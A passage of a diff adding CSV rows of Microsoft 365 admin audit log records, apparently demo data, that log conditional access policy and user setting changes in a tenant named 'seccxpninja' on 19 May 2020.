+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:34 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:55:42Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:15696,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:55:42 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:55:43Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:25676,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:55:42 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:55:46Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:23368,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:55:46 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:01:09Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:63891,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:01:08 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:01:02Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:1899,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:01:01 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:01:09Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:01:08 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:01:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:01:01 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T10:04:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T09:53:09.3129349Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 10:04:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T11:30:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T11:04:11.860286Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 11:30:18 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T12:00:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T11:04:11.860286Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 12:00:27 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T09:56:21Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\d019b383-c08f-49a4-bf1d-b5c1d487fb5a""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T09:53:08.4529376Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""12822615-cbdd-42fa-973c-b0ed8f6b17e2\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""0ca8f5e0-6a75-48cf-94e0-7fc78d58c51b\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 9:56:20 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""SOC event demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T09:56:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T09:53:09.3129349Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 9:56:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T09:55:08Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-19T09:54:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T09:53:09.3129349Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 9:54:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T10:02:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\d019b383-c08f-49a4-bf1d-b5c1d487fb5a""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T09:53:08.4529376Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""12822615-cbdd-42fa-973c-b0ed8f6b17e2\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""0ca8f5e0-6a75-48cf-94e0-7fc78d58c51b\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 10:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""SOC event demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T10:02:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\d019b383-c08f-49a4-bf1d-b5c1d487fb5a""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T09:53:08.4529376Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""12822615-cbdd-42fa-973c-b0ed8f6b17e2\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""0ca8f5e0-6a75-48cf-94e0-7fc78d58c51b\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 10:02:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""SOC event demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T10:49:46Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\d019b383-c08f-49a4-bf1d-b5c1d487fb5a""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T09:53:08.4529376Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""12822615-cbdd-42fa-973c-b0ed8f6b17e2\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""0ca8f5e0-6a75-48cf-94e0-7fc78d58c51b\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 10:49:46 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""SOC event demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T10:45:23Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T10:45:23Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T10:55:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T09:53:09.3129349Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 10:55:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T11:07:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T11:04:11.860286Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 11:07:28 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T11:05:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T11:04:11.860286Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 11:05:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T12:22:24Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T10:19:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\d019b383-c08f-49a4-bf1d-b5c1d487fb5a""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T09:53:08.4529376Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""12822615-cbdd-42fa-973c-b0ed8f6b17e2\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""0ca8f5e0-6a75-48cf-94e0-7fc78d58c51b\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 10:19:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""SOC event demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T10:24:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T09:53:09.3129349Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 10:24:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T11:14:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T11:04:11.860286Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 11:14:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T11:14:33Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
